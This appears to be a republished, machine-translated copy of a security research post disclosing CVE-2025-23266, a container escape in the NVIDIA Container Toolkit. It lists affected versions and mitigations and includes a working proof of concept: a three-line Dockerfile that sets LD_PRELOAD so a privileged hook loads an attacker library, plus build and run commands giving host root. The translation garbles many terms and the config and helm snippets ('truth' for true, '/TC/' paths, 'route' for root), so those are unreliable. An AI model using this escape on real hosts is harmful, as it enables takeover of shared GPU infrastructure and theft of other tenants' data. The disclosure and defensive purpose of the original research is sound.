nvidiascape-nvidia ai vulnerability (CVE-2025-23266)

Wiz Research has discovered a critical container escape vulnerability in the NVIDIA Container Toolkit (NCT), known as #NVIDIASCAPE. This toolkit has bolstered many AI services offered by cloud and SaaS providers, and vulnerabilities currently being tracked as CVE-2025-23266 have been assigned a CVSS score of 9.0 (critical). The malicious container can bypass the separation measurement and provide full root access to the host machine. This flaw is due to subtle misconceptions about how the toolkit handles OCI hooks, and could be exploited in a surprisingly simple three-line dockerfly.

As the NVIDIA Container Toolkit is the backbone of many managed AI and GPU services across all major cloud providers, this vulnerability represents a systematic risk to the AI ecosystem, breaking down walls where attackers separate different customers, affecting thousands of organizations.

The risk of this vulnerability is most severe in managed AI cloud services that allow customers to run their own AI containers on shared GPU infrastructure. In this scenario, malicious customers can use this vulnerability to run specially created containers, escape the intended boundaries, and provide full route control of the host machine. From there, an attacker can access, steal or manipulate sensitive data and their own models of all other customers running on the same shared hardware.

This is exactly a class of vulnerabilities that has proven to be a systematic risk across the AI cloud. A few months ago, Wiz Research demonstrated how similar container escape flaws allowed access to sensitive customer data in key services such as Replicate and DigitalOcean. The recurrence of these fundamental issues underscores the urgent need to scrutinise the security of core AI infrastructure as the world competes to adopt it.

Affected components:

nvidia Container Toolkit: All versions up to v1.17.7 (CDI mode only for versions 1.17.5 and earlier)

NVIDIA GPU Operator: All versions including 25.3.1

The main recommendation is to upgrade to the latest version of the NVIDIA Container Toolkit, as advised in the NVIDIA Security Bulletin.

Wiz customers can use this pre-built query in Wiz Threat Intel Center to find vulnerable instances of the Nvidia Container Toolkit in their environment.

Prioritization and context

Patching is highly recommended for all container hosts running a vulnerable version of Toolkit. Because exploits are delivered inside the container image itself, it is recommended to prioritize hosts that may run containers built from unreliable or public images. Runtime verification allows for further prioritization and focus patching efforts on instances where vulnerable toolkits are actively used.

It is important to note that Internet exposure is not a relevant factor for triaging this vulnerability. The affected hosts do not need to be published. Instead, the initial access vector may include social engineering attempts against the developer, supply chain scenarios where attackers can access the container image repository in advance, or environments where users can load any image.

For systems that cannot be upgraded immediately, Nvidia offers several mitigation options. The main way is to opt out of using the Enable-Cuda compat hook, which is the cause of exposure.

For nvidia container runtime

If you are using the NVIDIA container runtime in legacy mode, you can disable the hook by editing the /TC/nvidia-container-toolkit/config.toml file and setting the feates.disable-cuda-compat-lib-hook flag to true.

(Features)
disable-cuda-compat-lib-hook = truth

For NVIDIA GPU operators

If you are using an NVIDIA GPU operator, you can disable the hook by adding the disable-cuda-compat-lib-hook to the nvidia_container_toolkit_opt_in_features environment variable. This can be done by including the following arguments when installing or upgrading a GPU operator in helm:

– Set
“toolkit.env(0).name = nvidia_container_toolkit_opt_in_features” \
– Set
“toolkit.env(0).value = disable-cuda-compat-lib-hook”

Note: Other feature flags must be added as comma separate lists in the value field.

For users with a version of GPU operator prior to 25.3.1, you can deploy patched NVIDIA Container Toolkit version 1.17.8 by including the following arguments in the helm command:

-set “toolkit.version = v1.17.8-ubuntu20.04”

Note: For Red Hat Enterprise Linux or Red Hat OpenShift, you must specify the V1.17.8-UBI8 tag.

Why research the Nvidia container toolkit?

The entire AI revolution is built on the power of the Nvidia GPU. In the cloud, the key component that securely connects containerized applications to these GPUs is the NVIDIA Container Toolkit.

This is not the first time that this core component has revealed a serious vulnerability. Last year, Wiz Research revealed CVE-2024-0132. This is a similar container escape flaw that allows for a complete takeover of the host. These findings are part of ongoing research into AI supply chain security. We are investigating every layer of the AI stack, from the infrastructure (faces, replication, SAP AI core) to the model itself and the software used to run them (Ollama).

Technical Analysis

The path to this container escape is not a complex memory corruption bug, but rather a subtle interaction between container specs, trusted host components and classic Linux tricks. Understanding exploits requires examining three important parts: the OCI hook mechanism, specific flaws in the Nvidia implementation, and the weaponization of those flaws.

The Open Container Initiative (OCI) specification defines the standard for the runtime of a container. Part of this standard is the “hook” system. This allows the tool to run scripts at a specific point in the container lifecycle. The NVIDIA Container Toolkit (NCT) uses these hooks to perform key functions. Configure the container to communicate with the host’s NVIDIA driver and GPU.

When a container is started at the NVIDIA runtime, NCT registers several hooks, including the following CreateContainer hooks:

“CreateContainer”🙁
{
“path”: “/usr/bin/nvidia-ctk”,
“args”🙁“nvidia-ctk”, “Hook”, “Enable-Cuda-Compat”, “…”))
},
…
))

This hook runs as a privileged process for the host and sets up the environment required for the container.

The OCI specification defines different types of hooks. The Prestart hook runs in a clean, isolated context, but the CreateContainer hook has important properties. Inherit environment variables from container images unless explicitly configured

According to GitHub’s OCI specifications:

“… On Linux, this occurs before the Pivot_Root operation is performed, and before the mount namespace is created and set up.”

The ability to control the environment of privileged hooks gives the attacker many options. One of the most direct ones is to exploit LD_PRELOAD, a well-known and powerful Linux environment variable. LD_PRELOAD forces the process of loading a specific user-defined shared library (.SO file).

By setting LD_PRELOAD to DockerFile, an attacker can instruct the NVIDIA-CTK hook to load the malicious library. Worse, the CreateContainer hook runs along with the working directory configured in the container’s root file system. This means that malicious libraries can be loaded directly from the container image with a simple path to complete the exploit chain.

Exploit: 3-line Docker File

One of the most surprising aspects of this vulnerability is its simplicity. The attacker simply constructs the container image using a malicious payload and the next three lines of DockerFile.

Malicious dockerfile:

from Busybox
env ld_preload =/proc/self/cwd/poc.so
poc.so /

When this container runs on a vulnerable system, the NVIDIA-CTK CreateContainer hook inherits the LD_PRELOAD variable. Because the hook’s working directory is the container’s file system, it loads the attacker’s poc.so file into its own privileged process, achieving instant container escape.

To prove this, the poc.so poc.so payload simply executes the ID command and writes the output you own to the host.

Running an exploit:

# Build a malicious container
$ Docker build. -t nct-exploit

# Run it on a host with a vulnerable nvidia container toolkit
$ docker run – rm – runtime = nvidia -gpus = all nct-exploit

Result: Host Route

Responsible Disclosure Timeline

May 17, 2025: PWN2OWN Initial vulnerability report sent to NVIDIA in Berlin.

July 15, 2025: Nvidia has released security news and assigned CVE-2025-23266.

July 17, 2025: Wiz Research has published this blog post.

When discussing AI security, this vulnerability once again highlights that the most realistic and immediate risks to AI applications today come from the underlying infrastructure and tools. While hype about AI security risks tends to focus on AI-based attacks, vulnerabilities in the ever-growing “old-school” infrastructure of the AI technology stack continue to be an immediate threat that security teams should prioritize.

This practical attack surface is the result of the rapid introduction of new AI tools and services. Therefore, it is important for security teams to work closely with AI engineers to gain visibility into the architecture, tools and AI models used. Specifically, as this vulnerability suggests, it is important to build a mature pipeline to run AI models with complete control over source and integrity.

Furthermore, this study highlights that, not the first time, containers should not be relied on as the only means of isolation, rather than as a powerful security barrier. Especially when designing applications in a multi-tenant environment, you should always “estimate vulnerabilities” and implement at least one strong isolation barrier, such as virtualization (as explained in Peach Framework). Wiz Research writes extensively about this issue and can be detailed in previous research on Alibaba Cloud, IBM, Azure, Hugging Face, Replicate and SAP.

Stay in touch!

Hi! We are Nir Ohfeld (@nirohfeld), Sagi Tzadik (@sagitz_), Ronen Shustin (@ronenshh), Hillai Ben-Sasson (@hillai), Andres Riancho (@andresriancho), and Yuval Avrahami (@yuvalavra). We are a group of veteran white hat hackers with a single goal. It’s about making the cloud a safe place for everyone. We are primarily focused on finding new attack vectors in the cloud and revealing the issue of isolation between cloud vendors and service providers. We want to hear from you! Please feel free to contact us via X (Twitter) or email: Research@wiz.io.

versatileai

See Full Bio

What's Hot

5 major improvements to Gradio MCP server

Mistral’s LE Chat challenges Openai’s corporate advantage by adding deep search agents and voice modes

MistralAI offers LE chat voice recognition and deep research tools

US lawmakers introduce bipartisan chip security laws to stop China from acquiring advanced AI chips

Data and AI Status: Security and Privacy

ACENTURE, Microsoft Partners tackle cyber threats with AI

Military AI contract awarded to humanity, Openai, Google and Xai

Data and AI Status: Security and Privacy

Piclumen Art V1: Next Generation AI Image Generation Model Launches for Digital Creators | Flash News Details

Most Popular

Military AI contract awarded to humanity, Openai, Google and Xai

Data and AI Status: Security and Privacy

Piclumen Art V1: Next Generation AI Image Generation Model Launches for Digital Creators | Flash News Details

Don't Miss

5 major improvements to Gradio MCP server

Mistral’s LE Chat challenges Openai’s corporate advantage by adding deep search agents and voice modes

MistralAI offers LE chat voice recognition and deep research tools

Subscribe to Updates

What's Hot

nvidiascape-nvidia ai vulnerability (CVE-2025-23266)

Affected components:

Prioritization and context

For nvidia container runtime

For NVIDIA GPU operators

Why research the Nvidia container toolkit?

Technical Analysis

Exploit: 3-line Docker File

Malicious dockerfile:

Running an exploit:

Result: Host Route

Responsible Disclosure Timeline

Stay in touch!

Related Posts